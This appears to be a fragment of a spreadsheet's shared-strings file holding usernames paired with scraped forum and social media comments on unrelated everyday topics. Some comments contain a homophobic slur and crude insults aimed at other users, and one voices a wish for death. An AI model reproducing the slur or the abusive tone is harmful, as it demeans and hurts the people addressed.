    <t>Did you just straight up fucking die and they put that on to fix that?</t>
  </si>
  <si>
    <t>nroshania</t>
  </si>
  <si>
    <t>Thank you very much for your feedback, and will definitely build your logic into my work flow.</t>
  </si>
  <si>
    <t>smallwolf</t>
  </si>
  <si>
    <t>Hi Betriouffift, welcome to beyond blue. It sounds like you have had to grow up a lot recently - from living with your parents (and as you described in a toxic environment) to now supporting yourself at such a young age. And to do the things that you are doing now, working and school at the same time to do support yourself shows a inner strength in you, and commitment. I do not think I would have been equipped at your age to do that. I am a little unsure about what you might be looking for "advice" on, but if it were housing related then you could look at state government youth housing services? I hope I am allowed to post this link (below) as it contains a number of links to other web sites and services you could contact about whatever issues you might be experiencing... https://raisingchildren.net.au/grown-ups/services-support/services-families-of-teens/teens-housing More generally, you might want talk someone at Anglicare or UnitingCare about anxiety and/or housing. Are you still in contact with your parents? Do you have any sort of relationship with them still? What sort of support do you now? What are your relationships like with people you work with? A I'm here and listening to you, and tell me more of your story if it would be helpful for you Tim</t>
  </si>
  <si>
    <t>Phoenixrisingla</t>
  </si>
  <si>
    <t>This dog has had many "fetches" that did not end well and learned quickly that smashing the boards at full speed is less that ideal, I imagine.</t>
  </si>
  <si>
    <t>Casy17</t>
  </si>
  <si>
    <t>Yep I eat the breast. You occasionally find some shot in it, but not bad. Not all of the pellets hit it and some passes through</t>
  </si>
  <si>
    <t>Svargas05</t>
  </si>
  <si>
    <t>I took this when visiting LA not too long ago. I BARELY made it for the sunset and thought it was a great opportunity to shoot for some natural sky color grading. This was shot handheld. Used a Nikon D500, 10-24mm ultra-wide, 1/80 and f10. I'd love to get your thoughts or suggestions! Is it too dark? Does it look unnatural? Composition okay?</t>
  </si>
  <si>
    <t>MasterShadowWolf</t>
  </si>
  <si>
    <t>I got it for free actually. I found multiple versions online for free, which all seemed to be meant for bedrock but perhaps I got java versions without realizing it.</t>
  </si>
  <si>
    <t>67cj5</t>
  </si>
  <si>
    <t>LivinDaDream said: From what little I've been able to glean regarding charge/discharge curves for LC batteries, yeah, you can draw them way down without killing them, but they don't have a mostly flat discharge curve down to the last 10% or less as LFP do. So you can run them down to 0% SOC... what good is the battery for our typical applications when it's output voltage drops below 11V or 10.5V? As for anyone having bragging rights with LFP, the only thing I can brag about is that I found a solution that works within my limited space and weight confines...and that's a challenge many face. While I have a technical background and like solving problems, ongoing futzing around with my power system is not a hobby for me. I had a problem, I solved it, I'm happy and it didn't break the bank...and if I don't have to touch it for another 5-6 years, it's money well spent. Click to expand... Well the Idea is to keep it fully charged so it has the power you need when you need it so why bother to drain it right down in the first place, A battery that is at a low SOC is no use to anybody no matter if it is an FLA or a LFP, Lithium batteries are not all they can be at the moment but they will be, And hopefully people wise up about the pricing as well. My last FLA deep cycle battery was 9 years and 8 months old before it died and that was my fault because I didn't drive the vehicle often, the chances are it would still be going now 2 years later if I had not let it go down hill.</t>
  </si>
  <si>
    <t>blackandwhitepaint</t>
  </si>
  <si>
    <t>Do you own the house? If not, you don't get to decide that she lives in the house. You should have asked the homeowner for permission. Fess up and respect their answer ASAP. Also, if you have gone so far as to invite someone over from abroad and made them go through all the visa process etc. without even clearing it with people that own the house you live in, you don't sound like you are "successful" in the sense that matters. What if your family doesn't like it? You would have made her do all that work for nothing. Or did you hope to manipulate your family into saying yes by saying it's too late because your gf did all that work? If you were scared of their answer and putting it off until it snowballed, I don't see this as a trait of someone ready to be in a mature relationship. Own up, fess up, and suck it up if things don't go your way.</t>
  </si>
  <si>
    <t>KrayZZ</t>
  </si>
  <si>
    <t>Apptio| Bellevue, WA | Full-time | Onsite | $1300k-$150k https://www.apptio.com/company/careers/job-openings?gh_jid=1422641 You: You are an experienced software engineer who strives for excellence in the user’s experience as well as in your technical solutions. You have a curious mind and a passion for continuous improvement. You thrive in an agile and fast-paced environment. Us: We are a high-performing cross-functional team of developers, product managers, and designers. We are passionate about delivering elegant solutions to complex business problems, and we have a proven track record of delivering successful v1 applications that delight our customers. What we want you to do: You will work with your scrum team to deliver impactful and valuable features bi-weekly. You will personally own end-to-end features from concept to design to production, and partner with product managers, user experience designers, and other engineers to achieve high-quality solutions. Basic Qualifications: 3+ years of experience delivering enterprise level software preferably in JavaScript or other JavaScript flavor (TypeScript, etc.) Experience developing Single Page Web Applications with JS, CSS, HTML and frameworks like React, Angular, or equivalent Ability to handle multiple competing priorities in a fast-paced environment Technical leadership experience in building and delivering complex software systems Experience in working with customers, product management, and senior management to deliver value to the market Robust knowledge of data structures, algorithms, enterprise systems, asynchronous architectures, and object oriented programming Demonstrated experience with best SDLC practices: coding standards, reviews, code management, build processes, and testing Experience designing and implementing REST APIs B.S. in Computer Science or equivalent experience Preferred Qualifications: Experience with backend web-based Java development and Linux-based integrated development environments, or equivalent (e.g., NodeJS w/ Express or ASP.NET MVC) Experience developing Software as a Service (SaaS) applications and understanding the impact of this architecture in a deployment environment Experience building large applications at scale using modern best-practices Database implementations (query optimization, index generation, caching) or NoSQL DBs a plus The Company Apptio is the business management system of record for hybrid IT. We transform the way IT runs its business and makes decisions. With our cloud-based applications, IT leaders manage, plan, and optimize their technology investments across on-premises and cloud. With Apptio, IT leaders become strategic partners to the business by demonstrating the value of IT investments, accelerate innovation, and shift their technology investments from running the business to digital innovation. Hundreds of customers choose Apptio as their business system of record for hybrid IT. For more information, please visit www.Apptio.com. Apptio Inc. is not open to 3rd party solicitation or resumes for our posted FTE positions. Resumes received from 3rd party agencies that are unsolicited will be considered complimentary. Apptio, Inc.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Apptio, Inc. complies with applicable state and local laws governing nondiscrimination in employment in every location in which the company has facilities.</t>
  </si>
  <si>
    <t>RandomGuylol01</t>
  </si>
  <si>
    <t>And if i farm on the 2 winter lanterns from the dlc what is the chance?</t>
  </si>
  <si>
    <t>ktchch</t>
  </si>
  <si>
    <t>Components like transformers are based on them, but in general they aren’t used for much more than research and education.</t>
  </si>
  <si>
    <t>zyarva</t>
  </si>
  <si>
    <t>This is how pyramid scheme falls, not enough sucker on the bottom.</t>
  </si>
  <si>
    <t>Seer_Sunshine</t>
  </si>
  <si>
    <t>When chardy plays like this, it's tough to understand why he isn't more successful than he is. And zverev just gives me early Murray vibes. Shitty second serve, but other facets improving well.</t>
  </si>
  <si>
    <t>KarnaBro</t>
  </si>
  <si>
    <t>This could be exact moment Tulsi has opportunity to capture majority of Americans support.</t>
  </si>
  <si>
    <t>james</t>
  </si>
  <si>
    <t>about 18sqm samll shop for lease. bluechip location. rear of Burke rd camberwell. facing camberwell sunday market and woolworth carpark. perfect for takeaway cafe, bubble tea florist and ect. used to be a coffee shop, all water and electricity connected, ready to operate straight away.</t>
  </si>
  <si>
    <t>Guncriminal</t>
  </si>
  <si>
    <t>You're not in a position to mock or question other people's self awareness. You killed any credibility you had stone-dead when you tried to suggest that having to provide for wasters who play video games all day was voluntary and the attempted to justify it with "why do you want to be less free?" (or something comparably cringey).</t>
  </si>
  <si>
    <t>Flapjacktastic</t>
  </si>
  <si>
    <t>A few years, in any case. It's confusing because the three offsides (open play, at the breakdown/scrum/maul and 10m rule) are all different.</t>
  </si>
  <si>
    <t>CraftingMenace</t>
  </si>
  <si>
    <t>I would love her. If there's any other Fire Emblem character added, I hope it's her.</t>
  </si>
  <si>
    <t>isntthatjustprecious</t>
  </si>
  <si>
    <t>[Fuzzy Rabbit](https://smile.amazon.com/Fuzzy-Rabbit-Rosemary-Billam/dp/0394863461/ref=sr_1_1?keywords=fuzzy+rabbit+rosemary+billam&amp;qid=1571277478&amp;sr=8-1), by Rosemary Billam?</t>
  </si>
  <si>
    <t>SteveBDrums</t>
  </si>
  <si>
    <t>The city invested a TON of taxpayer money into this little experiment of Mr. Dickson's. I sure hope that they will recoup some of those costs if he bails out this early into it.</t>
  </si>
  <si>
    <t>Lifexprt</t>
  </si>
  <si>
    <t>it will most likely be marketed and sold under a different separate brand</t>
  </si>
  <si>
    <t>I’ll post rates in a bit. Looking for folks to hang out with though. Hit me up if you’re in Indiana near Purdue. Could use some drinking buddies or the like.</t>
  </si>
  <si>
    <t>crewserbattle</t>
  </si>
  <si>
    <t>There's not much shade in Lambeau to be fair.</t>
  </si>
  <si>
    <t>Packrat1010</t>
  </si>
  <si>
    <t>Tbh, this shit is exactly why the expectation of prospective presidents revealing their tax returns is commonplace. They weren't doing it to show off how squeaky clean theirs is, it's to show you're not flagrantly crooked.</t>
  </si>
  <si>
    <t>winston137</t>
  </si>
  <si>
    <t>I imagine every person in those cars frowning and angry. It was a beautiful day for a ride...</t>
  </si>
  <si>
    <t>Bijzettafeltje</t>
  </si>
  <si>
    <t>Shut the fuck up you filthy redditor.</t>
  </si>
  <si>
    <t>jellatubbies</t>
  </si>
  <si>
    <t>That's the dumbest thing I've ever heard, so a pokemon that's technically "more rare" doesn't count, go niantic lol</t>
  </si>
  <si>
    <t>Babyreg1</t>
  </si>
  <si>
    <t>The midwife said my son has a stroder ? Does anybody else baby have this if so do you have any advice</t>
  </si>
  <si>
    <t>&gt;&gt;268566929 Pretty sure it's purpose was to prove that mainmans a bitch. And if you ACKTUALLEY watched the video, it does that very well.</t>
  </si>
  <si>
    <t>Iceman_USCG</t>
  </si>
  <si>
    <t>Black Armory</t>
  </si>
  <si>
    <t>Ask the trainer when you next take your pretend Basset in for training.</t>
  </si>
  <si>
    <t>There's nothing wrong with the letter, you faggots just have Trump Derangement Syndrome</t>
  </si>
  <si>
    <t>Nebucadneza</t>
  </si>
  <si>
    <t>Yu forgot the influx of aimbots that make people avoid PVP... just not fun in unregulated teritory</t>
  </si>
  <si>
    <t>&gt;&gt;481969245 &gt;&gt;481969269 I want to be greeted. How do I get greeted. Please respond.</t>
  </si>
  <si>
    <t>mehtalika</t>
  </si>
  <si>
    <t>I can't see the comment, did something happen?</t>
  </si>
  <si>
    <t>Luomulanren</t>
  </si>
  <si>
    <t>If you do intend to sell it, always keep in mind of your total cost which includes selling fees (Bricklink, eBay, Paypal... etc.), shipping (postage, box, packing material and the drive to the post office), the cost of storage, the risk of the item being damaged during transit and finally your time.</t>
  </si>
  <si>
    <t>zSlay3r</t>
  </si>
  <si>
    <t>I died laughing. Thx, now my t-shirt is wet ... :D</t>
  </si>
  <si>
    <t>heckawesushi</t>
  </si>
  <si>
    <t>umm conspiracy.... ever watch the 2002 western conference finals?</t>
  </si>
  <si>
    <t>schwoops</t>
  </si>
  <si>
    <t>Wait about 30s, drive out of boost until oil comes up to temp, about 185F.</t>
  </si>
  <si>
    <t>nhschneider</t>
  </si>
  <si>
    <t>We met Hugh and Kate, two young Aussies, as we were sailing across Indonesia. They were having the times of their lives, enjoying adventures aboard their boat before they started raising a family. The last we had heard from them they had returned to Australia and are now the proud parents of two little boys. However, just a couple of days ago, we heard from Kate that Hugh had been killed during an accidental jibe while aboard a friends boat. Our hearts are broken. Please remember that this sport/lifestyle we choose has many inherent dangers and the risks we take can affect lives around the world if a catastrophe occurs. Please join me in a moment of silence to remember my friend Hugh. Fair winds and calm seas.</t>
  </si>
  <si>
    <t>SomeUnicornsFly</t>
  </si>
  <si>
    <t>I remember this story. I believe the driver's version of events however using lethal force was probably unnecessary given the circumstances.</t>
  </si>
  <si>
    <t>Reminder that Archerage sold gear directly to players and a ton of people including myself made real money with an apex dupe that 90% of people never got caught with.</t>
  </si>
  <si>
    <t>Jacksshot</t>
  </si>
  <si>
    <t>Hello, Im new to the Mauser brotherhood. I recently inherited a 1943 dot K98, all numbers match. The stock was cut down to fit in a duffel bag to bring back from WW2. Im looking for help with a value and weather or not its worth trying to replace the stock for collectibility. Any help would be great!</t>
  </si>
  <si>
    <t>Mad_at_reddit</t>
  </si>
  <si>
    <t>Checks out, TIL.</t>
  </si>
  <si>
    <t>gaobij</t>
  </si>
  <si>
    <t>I haven't watched a lot of their games, but their defense gets put in a lot of tough spots. Other offenses have to do a lot to keep up.</t>
  </si>
  <si>
    <t>LowIQMod</t>
  </si>
  <si>
    <t>&gt;We dont see mass shootings with full auto rifles do we? Except people can and do own them.</t>
  </si>
  <si>
    <t>noishe and cellel duo unit when</t>
  </si>
  <si>
    <t>Superalbix</t>
  </si>
  <si>
    <t>It's also on Monster Bash in the RED or BLU spawn i don't remember which.</t>
  </si>
  <si>
    <t>Jorge</t>
  </si>
  <si>
    <t>I wish they sell things from the hotel to bring a memory of them. Maybe a boutique or store would be nice The room was beyond expectations. With 5 heaters and 2 humidifiers at perfect set up there was no need to touch them at all. The view of the Potala Palace is better than images. But what really caught my attention was the full staff of the hotel. They were always on the top of me to have the best experience possible. Being in 5 stars hotel in 4 continents, this hotel tops them in size of the room, beauty and service. The Yak Steak is the best of the city. The hotel even helps the client with Permits to visit Lhasa. What else can I ask for? If I would back to Lhasa I will book it again for sure Stayed in October 2019</t>
  </si>
  <si>
    <t>misterpapabear</t>
  </si>
  <si>
    <t>You got this link from a very dead community.</t>
  </si>
  <si>
    <t>Iam-The-Yellow-King</t>
  </si>
  <si>
    <t>And /u/-edgar- is here to use the same recycled answers</t>
  </si>
  <si>
    <t>Scarr64</t>
  </si>
  <si>
    <t>You're not here to discuss rationally, you are here to argue. What's the point in that?</t>
  </si>
  <si>
    <t>Pizzaparker452</t>
  </si>
  <si>
    <t>Tough guy mike, fights because someone huwt hiz feewings. Grown ass man fighting a bunch of skinny twerps probably barely out of their teens, none of them even putting up a fight. Yeah, hot shit.</t>
  </si>
  <si>
    <t>pygmypuffonacid</t>
  </si>
  <si>
    <t>Upi or maybe the equivalent of masturbation carpet burn? Maybe go to urgent care or a urologist. I am not a doctor.</t>
  </si>
  <si>
    <t>Izuku14</t>
  </si>
  <si>
    <t>1. HOW TF DOES A SUPERCELL ID GET SCAMMED 2. How tf do we even help 3. Read 1 and 2</t>
  </si>
  <si>
    <t>mofohank</t>
  </si>
  <si>
    <t>ESH. He doesn't sound very helpful but you're trying to say he's partly to blame when it was completely your fault. Leaving the spare in the house makes sense but how many times has this happened before? You don't sound too concerned about getting robbed. Any chance he was teaching you a lesson?</t>
  </si>
  <si>
    <t>Polar_Bear</t>
  </si>
  <si>
    <t>Pens are trash BOO, phil the thrill is gone baby gone yup I meant only the early games boo no scoring bolts/cats</t>
  </si>
  <si>
    <t>therealchipchampion</t>
  </si>
  <si>
    <t>An unfathomable dread washed over me when, shopping for groceries, I began to think about the gas I'd left running back at home. It would be a real shame if I went through that month of trouble getting my family to all visit at the same time only to come back to a house that wasn't burning.</t>
  </si>
  <si>
    <t>Talnoy</t>
  </si>
  <si>
    <t>Personally, I just *hate* gestures. Too much room for error, too much misses, not consistent enough.</t>
  </si>
  <si>
    <t>Zen_Guitar</t>
  </si>
  <si>
    <t>cheapgtrs said: ↑ You always have the coolest guitars. I wish you great success Click to expand... hey...thx @cheapgtrs I appreciate that !</t>
  </si>
  <si>
    <t>IHaveFoodOnMyChin</t>
  </si>
  <si>
    <t>Found a great Biergarten in Brooklyn during my long layover. Getting a beer before flying out to the real Oktoberfest in Munich</t>
  </si>
  <si>
    <t>silentimagehelp</t>
  </si>
  <si>
    <t>Yep, I think the same !</t>
  </si>
  <si>
    <t>absentbird</t>
  </si>
  <si>
    <t>/r/Conservatives allows this on the front page? Yikes.</t>
  </si>
  <si>
    <t>Whatsnewpussyhat</t>
  </si>
  <si>
    <t>The people complaining are men. There are so few trans men who would contemplate pregnancy it shouldn't matter at all that a breastfeeding charity uses the image of a woman. It's fucking ridiculous that in the name if inclusivity they exclude the 50% of the actual population who are their target market.</t>
  </si>
  <si>
    <t>Fuyukage</t>
  </si>
  <si>
    <t>I mean it makes sense that light and void don’t have their own will when you think about it. They just exist. Both require the other to exist and if one goes away, so does the other. They’re not trying to eradicate the other - just exist. But then others had to come along and fuck it up</t>
  </si>
  <si>
    <t>smokingcannoli</t>
  </si>
  <si>
    <t>I think he might've died behind the '18 OL lol</t>
  </si>
  <si>
    <t>steun91</t>
  </si>
  <si>
    <t>All the mirrors in episode 1 was something I noticed as well! And UFO-lens-flares in episode 2... Maybe.</t>
  </si>
  <si>
    <t>TodayIsTheOnlyDay</t>
  </si>
  <si>
    <t>Wonderful list! I like the idea of #7. I will try it out!</t>
  </si>
  <si>
    <t>lil47mase</t>
  </si>
  <si>
    <t>Coming from a computer engineer, i can tell this is complete bullshit. I’m not a fucking idiot and have been on this sub for years. Used to be a sub that was helpful, and since then it’s gone down hill. Thanks for the comment anyway</t>
  </si>
  <si>
    <t>ImDaytonaturn4</t>
  </si>
  <si>
    <t>I dunno every week there is 40 other drivers who dont win but Kyle is the only one I see who gets to treat the media like shit and pout. I don't know if I have ever heard an interview when he has a bad day for him to take personal responsibility. He reminds me of the kid who turns the video game off when they start losing and blames it on the controller. At least kurt drove for some shitty teams to get humbled.</t>
  </si>
  <si>
    <t>PennysPocket</t>
  </si>
  <si>
    <t>OP My eldest is 17 my youngest is 12 with a 15 yo and another 12 yo in the middle. I could not tell you the first food/taste/lick any of them had. Know why? Because that shit does not matter. What matters is ill feeling, arguing and atmosphere amongst families. That affects kids. Not what food they had at 4 months old. Gain some perspective.</t>
  </si>
  <si>
    <t>VMarkB</t>
  </si>
  <si>
    <t>Can you give some examples and reasons for why I would always pay attention to surroundings?</t>
  </si>
  <si>
    <t>QuestionMyChoices</t>
  </si>
  <si>
    <t>Thanks for sharing this Nick! I'll admit it makes me considerably more interested in the Modular!</t>
  </si>
  <si>
    <t>Seamack</t>
  </si>
  <si>
    <t>Zeeboo, it's 15 yr olds and older. He says some 15 year olds look 18 (which is true) having 3 daughters has taught me that. It only takes some makeup and a sexy outfit and schoolgirls CAN look older. He is fancying them whilst they are in uniform so there can be no doubt to anyone that they can't be older than 16.</t>
  </si>
  <si>
    <t>Lemon929292</t>
  </si>
  <si>
    <t>Me except that I’m still on tinder</t>
  </si>
  <si>
    <t>Eazy3006</t>
  </si>
  <si>
    <t>Not sure where you're getting your info ? All phone manufacturer have complete control over their android version . The reasons why they choose to go with android is because android is an open source code so you get to do whatever you want with it but the basics are already there if you want them . Nothing stops you from changing everything in android and make it look and act the way you want it to . That's what I call control . By choosing android you also have access to google play store which is why companies don't create an os from the ground up cause it would be a monumental task to get developer on board to create millions of apps . Also Huawei is not out of android . Those were purely empty threat and since android is open source , they can keep using android , just not the Google services.</t>
  </si>
  <si>
    <t>cinnamorolling</t>
  </si>
  <si>
    <t>Worst tonsillitis ever. All that stuff was pulled out and then scraped off.</t>
  </si>
  <si>
    <t>Grits</t>
  </si>
  <si>
    <t>That was actually pretty cool. If you can't understand the difference between a made up joke video, and a real threat you're just letting your emotions whip you into line. I have seen videos of people urinating on christian symbols, beheading our president and all kinds of other garbage that I blow off because it's someone else's made up weird fantasy so it doesnt mean a damn thing to me. Good video, good content, and through its coarse subject material it draws out and highlights those who let their emotions control them. Society....overstimulated and poorly educated.</t>
  </si>
  <si>
    <t>*Detection*</t>
  </si>
  <si>
    <t>Quote: Originally Posted by DoobyDroid Is the UK going to get included in emui 10 beta anybody know? Tried beta app but always fails log in Sent from my ELE-L09 using Tapatalk Have to wait and see Open Beta Update Schedule for EMUI 10: Huawei P30/P30 Pro: Mid-October 2019</t>
  </si>
  <si>
    <t>willislol</t>
  </si>
  <si>
    <t>Fork and knife not pictured haha. But yes, I did use a fork to mix it all ip</t>
  </si>
  <si>
    <t>SuicideForDoggie</t>
  </si>
  <si>
    <t>Oh yes, the “American Dream” doctrine, aka, whatever immigration policy a federal judge doesn’t like.</t>
  </si>
  <si>
    <t>markcrane2002</t>
  </si>
  <si>
    <t>Just ordered in Burgundy, got a pair in blue for the summer and they're the most comfortable pair of trainers I've ever had.</t>
  </si>
  <si>
    <t>Ed Kennell</t>
  </si>
  <si>
    <t>NFL....nope. This was the scene from my dining room this afternoon while I watched the Ravens and Steelers. There were actually two eagles feeding on this road killed deer all day. Only one would feed as the other stood sentry about 100 yards away. They showed no aggression to the raven and seemed to feel more comfortable when the raven was feeding. It appeared they welcomed the second pair of eyes to watch for danger. The deer is about 70 yards from my back door.</t>
  </si>
  <si>
    <t>SpaceZombie13</t>
  </si>
  <si>
    <t>i'm in the Crash Bandicoot fandom. i laughed at all the journalists calling the N. Sane Trilogy "the dark souls of platformers" when it's just basic 90's difficulty lol</t>
  </si>
  <si>
    <t>kwallio</t>
  </si>
  <si>
    <t>I would say they are hooded but not very much so. As you get older probably more of the eyelid will be covered by the skin overhang. You also have low brows and a small lid space. I like your eyes, they're pretty.</t>
  </si>
  <si>
    <t>AnonymousFordring</t>
  </si>
  <si>
    <t>knowing his shield he won't be *unified* with you for long</t>
  </si>
  <si>
    <t>DankMemesMods</t>
  </si>
  <si>
    <t>Thank you for submitting to /r/dankmemes. Unfortunately, your submission has been removed for the following reason(s): --- * REEEEEEEEEEEEEEEEPOST --- --- *^If ^you ^have ^any ^questions, ^you ^can ^message ^the ^mod ^team ^[here](http://contact.dankmemesreddit.com) ^Replies ^to ^this ^removal ^comment ^may ^not ^be ^answered.* ^(Reposting a removed post without express moderator approval will result in a ban.)</t>
  </si>
  <si>
    <t>Neekoly</t>
  </si>
  <si>
    <t>Thanks. It’s a bit stupid how a marker didn’t pop up to show me where to go..</t>
  </si>
  <si>
    <t>Startspillowfights4</t>
  </si>
  <si>
    <t>Baylor, Minnesota, and Wake Forest are the only undefeated P5 teams not listed as still in contention.</t>
  </si>
  <si>
    <t>Foxias</t>
  </si>
  <si>
    <t>I'm lucky that the only time that I've seen bugzy in my games was when he was Kinessa on my team</t>
  </si>
  <si>
    <t>A_Ticket_2_Ride</t>
  </si>
  <si>
    <t>Awww, thank you so much! That means so much to hear someone call me that brave to post this! I’m really happy you enjoyed this!</t>
  </si>
  <si>
    <t>Drumsticc</t>
  </si>
  <si>
    <t>I waited so long for that adaptation</t>
  </si>
  <si>
    <t>ThatBlueLGT</t>
  </si>
  <si>
    <t>"Keep your head up" by Andy Grammer lmao</t>
  </si>
  <si>
    <t>Alexandoy</t>
  </si>
  <si>
    <t>Jay Harris will defend his European flyweight title against Paddy Barnes on October 11 at the Ulster Hall in Belfast, Ireland. Barnes is an Olympian with a record of 6-2 and can give the undefeated Harris a run for his money. Harris has 16 wins and 8 KOs for his pro career. Commonwealth welterweight title - Paddy Gallagher vs. Chris Jenkins European bantamweight title - Georges Ory vs. Sebastian Perez European featherweight title - Andoni Gago vs. Jesus Sanchez European flyweight title Jay Harris vs Angel Moreno WBO flyweight title fight</t>
  </si>
  <si>
    <t>thanatopsiturvy</t>
  </si>
  <si>
    <t>Ahhh this was so amazing! So visceral and tactile - I got a very real sense of the claustrophobia and the panic. Very gripping - I felt really invested and wanted Zana to make it and be okay. You're writing is also sooo smooth and easy to read. Can't wait to see what else you present this month!</t>
  </si>
  <si>
    <t>CrysanthemumFrog</t>
  </si>
  <si>
    <t>The ranch is true. We Muricans dip everything in ranch.</t>
  </si>
  <si>
    <t>Oimelc</t>
  </si>
  <si>
    <t>Over in the Origin 300 forums, @Shanex reported that their size three missiles had to be fired at an angle to get them to lock. Since the Defender missiles are notoriously hard to lock I thought I'd try a similar approach,and sure enough, it works reliably! Aim about a screen inch above the ship you wish to target and it will lock every time. Not sure if it's a bug or feature, but it's good to have the full arsenal available. Edit: to clean up typos/bad auto-corrects</t>
  </si>
  <si>
    <t>You bet a trip in Quebec this year!</t>
  </si>
  <si>
    <t>skullsquid1999</t>
  </si>
  <si>
    <t>Then she should probably reevaluate her relationship and the effort being put forth by her boyfriend rather than focusing it on money, don't you think?</t>
  </si>
  <si>
    <t>The problem is that athletics are treated differently from any other extracurricular</t>
  </si>
  <si>
    <t>littlegreenthings</t>
  </si>
  <si>
    <t>I’m traveling around Australia and meeting so many amazing fucking people that everything they do is just so cute and makes my heart happy. There’s a Chilean that lays on the boogie board and sings Spanish songs to himself in the pool every morning and just watching everyone doing their own little daily happiness things makes me happy.</t>
  </si>
  <si>
    <t>strutt3r</t>
  </si>
  <si>
    <t>I do this all the time. We have one table with sales information. We have another with sales rep information. The sales rep assigned to the account may change over time. So the sales rep table might have: SALES REP - ACCOUNT\_ID - PERIOD JOHN CANDYCO 4 JAMES CANDYCO 5 I want to see the spend for John's accounts in period 4, then I need to join on both the account\_id and the period, or it's going to join both John and James in my results. I often end up joining on 3 criteria - account, time period and product.</t>
  </si>
  <si>
    <t>euclidiancognizance</t>
  </si>
  <si>
    <t>Hubble is gonna feel like fads hand me down 1st gen dslr soon. All the amazing things its fone for science.</t>
  </si>
  <si>
    <t>Gingeysaurusrex</t>
  </si>
  <si>
    <t>Houseboats and schools are not equivalent</t>
  </si>
  <si>
    <t>Mister_Mismanager</t>
  </si>
  <si>
    <t>Life is so fucking boring. It has nothing to hold my attention for more than two seconds. Work, home, work, home, for another 40-60 years. Death can't come too soon.</t>
  </si>
  <si>
    <t>monolith17</t>
  </si>
  <si>
    <t>Lol boot kicker</t>
  </si>
  <si>
    <t>notaboofus</t>
  </si>
  <si>
    <t>Goodass sandwich, by the way.</t>
  </si>
  <si>
    <t>orpheo</t>
  </si>
  <si>
    <t>Re: Custom shop SH-6 Distortion? Anyone ever? Originally Posted by RyeDaddy For high powered metal pickups I l ve the Duncan Distortion. Im looking for something with that same screaming tonality and EQ with maybe a little less compression, more harmonics, a little more clarity, slightly less hot (not alot), and maybe just a touch brighter (it will have a cover and I prefer the brighter more aggressive sound of my uncovered ones vs the covered I have) Im thinking of calling the Seymour Duncan Custom Shop and having MJ wind me one. So I dont sound like an idiot as Im not an expert in pickup design, what would you suggest I ask for? Only real requirement is it must retain the same basic EQ balance and tight response, and it must have gold covers and screws. This will be going in a Flying V Custom with a Richlite fretboard, its slightly darker sounding. Tuning will be D standard/ drop C. Im thinking I want to ask for slightly underwound in the 15.5 - 16k range, same double thick ceramic, maybe degaussed a bit if thats do-able in a ceramic? Does this make sense for what Im looking for? I know theyre the experts and will shed some light and probably come up with what I want but still curious as to what those who know more have to say. Thought about the George Lynch Hunter, but not sure if its got a double thick magnet, looks like standard and I believe its probably just a Dokkenbucker with a new name. Not opposed, theres just not a lot of info about it out there or demos. Any other suggestions for brands or models Im all ears, Ive been through BKP Nailbombs in both alnico and ceramic and they didnt do it for me, neither did the Holy Diver. I dont care for the JB either, or the 498T that came in it. you're asking for: same screaming tonality and EQ with maybe a little less compression, more harmonics, a little more clarity, slightly less hot (not alot), and maybe just a touch brighter That's exactly what th SH6N is. It's not underwound, it just uses a different wire but still has the double thick ceramic magnet. It is a touch brighter, a bit more open, has amazing harmonics but the same growl and bite of the SH6 bridge. I'd suggest you give that a go first before you dive headfirst into a customshop pickup. I'd strongly, strongly suggest going that route. It's a closer fit to your wishes tonally than the pegasus, nazgul or perpetual burn (if we're looking at standard offerings from SD) and it's not unlikely you'll find this pickup fairly cheap on ebay or craigslist IMHO it's one of the most underrated BRIDGE pickups SD makes and totally mismatched as a neck pickup. The SH6 and SH6N would be better served with a JazzB or Sentient.</t>
  </si>
  <si>
    <t>killebrew_rootbeer</t>
  </si>
  <si>
    <t>Italy needs 11.5 or so on their last routine to get a medal. Simone needs a 9.6 to get gold.</t>
  </si>
  <si>
    <t>strongbud</t>
  </si>
  <si>
    <t>https://www.2oceansvibe.com/2018/07/23/youve-been-using-blood-is-thicker-than-water-incorrectly-your-entire-life/ the internet is a funny place isn't it?</t>
  </si>
  <si>
    <t>ErisMoon91</t>
  </si>
  <si>
    <t>My clan has 2 teams going for the day 1 raid. The second group of players still needs a couple of people if you're interested - Aidanbrum7 on psn.</t>
  </si>
  <si>
    <t>MattYoungZA</t>
  </si>
  <si>
    <t>Ha! Thanks! Nope I've never built a horn bow before. I've build many self/backed bows before, though. Yea a lot of the techniques are similar across the Asiatic composite designs. The Korean bow is obviously a different shape to the Turkish bow, being so reflexed at the handle, but I can definitely see your point. As for the amount of sinew, I can believe that much was used. In my experience, domestic animal sinew doesn't seem to have the same springiness as venison. That may be tough to prove, though. It definitely feels less lively. One thing is certain: beef sinew is horrible to process. It's very fatty and greasy. The main reason they used more than I will is because I'm only aiming for somewhere between 45 and 50# draw weight. Turkish war bows regularly exceeded 120# of draw weight, so required an awful amount of sinew just to survive. Here's a scary stat: at 125lbs of draw weight, a Turkish horn bow experiences around 9000lbs of tension along the back. Hence the silly amount of sinew required, haha.</t>
  </si>
  <si>
    <t>Operations Manager</t>
  </si>
  <si>
    <t>I have been working Benefits are hardly matched elsewhere. Opportunities for growth are numerous. And you get to travel all over the world! Cons I have no cons to speak of.</t>
  </si>
  <si>
    <t>yaiyen</t>
  </si>
  <si>
    <t>This was because Bernie did have to push Obamacare and Obama dint event give public option</t>
  </si>
  <si>
    <t>Call_Me_Tsuikyit</t>
  </si>
  <si>
    <t>World War 2</t>
  </si>
  <si>
    <t>QueenParvati</t>
  </si>
  <si>
    <t>Sandra flips and JT goes on to win. That tribal was make or break for JT/Parv making it to the final 3 - one of the reasons she was willing to play both idols. Such an amazing showdown.</t>
  </si>
  <si>
    <t>OcelotGumbo</t>
  </si>
  <si>
    <t>the worst</t>
  </si>
  <si>
    <t>BFG_012</t>
  </si>
  <si>
    <t>Limiting the sexual preference of an identity (straight, bi, gay, lesbian, etc.) to only cis people is transphobic because it invalidates their gender identity. Someone could be cis and be in a relationship with someone who's trans and still exist in that same identity. If you refuse to acknowledge any trans person as attractive then you do likely have some transphobia to unpack.</t>
  </si>
  <si>
    <t>hellrazor071</t>
  </si>
  <si>
    <t>It's one thing to play 1-2h of fifa the way you want to play it, it's totally different to play for 1-2h just to grind for those tokens If i spent time grinding for those icons i would never say that i got them for free, that's the point.. I would rather spend time trading than playing in delay (even menu is with delay) with silver cards just to get some icon that won't even stay in my team for more than few weeks I'm not saying that people who get them are wasting their time, just that they don't get them for FREE at all...</t>
  </si>
  <si>
    <t>Pigbank1993</t>
  </si>
  <si>
